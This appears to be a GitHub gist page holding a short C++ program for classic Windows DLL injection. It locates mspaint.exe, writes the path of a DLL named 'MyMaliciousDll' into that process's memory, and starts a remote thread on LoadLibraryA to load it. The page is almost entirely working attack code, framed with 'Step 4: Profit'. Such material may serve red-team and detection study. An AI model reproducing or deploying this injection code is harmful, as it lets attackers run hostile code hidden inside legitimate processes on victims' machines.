Skip to content

Instantly share code, notes, and snippets.

@christophetd
Last active April 23, 2023 03:02
Show Gist options
  • Save christophetd/b37c780d973cb2272562cde10af7596d to your computer and use it in GitHub Desktop.
Save christophetd/b37c780d973cb2272562cde10af7596d to your computer and use it in GitHub Desktop.
#include <iostream>
#include <windows.h>
#include "Processthreadsapi.h"
#include "Libloaderapi.h"
#include <tlhelp32.h>
#include "winternl.h"
using namespace std;
int err(const char* msg) {
cerr << msg << endl;
return 1;
}
int find_process(const wchar_t* process_name) {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
int returnValue = 0;
if (!Process32First(snapshot, &entry)) {
goto cleanup;
}
while (Process32Next(snapshot, &entry)) {
if (wcscmp(entry.szExeFile, process_name) == 0) {
returnValue = entry.th32ProcessID;
goto cleanup;
}
}
cleanup:
CloseHandle(snapshot);
return returnValue;
}
#define INJECTION_TARGET L"mspaint.exe"
#define DLL_TO_INJECT "C:\\Users\\Christophe\\source\\repos\\MyMaliciousDll\\x64\\Release\\MYMALICIOUSDLL.DLL"
int main()
{
cout << "Getting handle on target process" << endl;
int desiredAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
HANDLE hTargetProcess = OpenProcess(desiredAccess, true, find_process(INJECTION_TARGET));
if (hTargetProcess == NULL)
return err("Unable to get a handle on target process");
// Step 2: Write DLL name in target process memory
// NOTE: the DLL must be 64-bit
// Allocate new memory region
LPVOID targetDataPage = VirtualAllocEx(hTargetProcess, NULL, strlen(DLL_TO_INJECT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (targetDataPage == NULL)
err("Unable to allocate memory in target process");
// Step 2.2: Write DLL path to allocated memory
if (0 == WriteProcessMemory(hTargetProcess, targetDataPage, DLL_TO_INJECT, strlen(DLL_TO_INJECT), NULL))
return err("Unable to write DLL path to target process memory");
// Step 3: Get address of the "LoadLibraryA" function
cout << "Retrieving LoadLibraryA address" << endl;
HMODULE hModule = GetModuleHandleA("kernel32.dll");
FARPROC load_library_addr = GetProcAddress(hModule, "LoadLibraryA");
cout << "LoadLibraryA @ " << load_library_addr << endl;
// Step 4: CreateRemoteThread with this address and "dllname" as a parameter
DWORD threadId = 0;
HANDLE hThread = CreateRemoteThread(
hTargetProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE) load_library_addr,
targetDataPage,
0,
&threadId
);
if (hThread == NULL) {
cerr << "Unable to create remote thread: error " << GetLastError() << endl;
return 1;
}
// Step 4: Profit
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment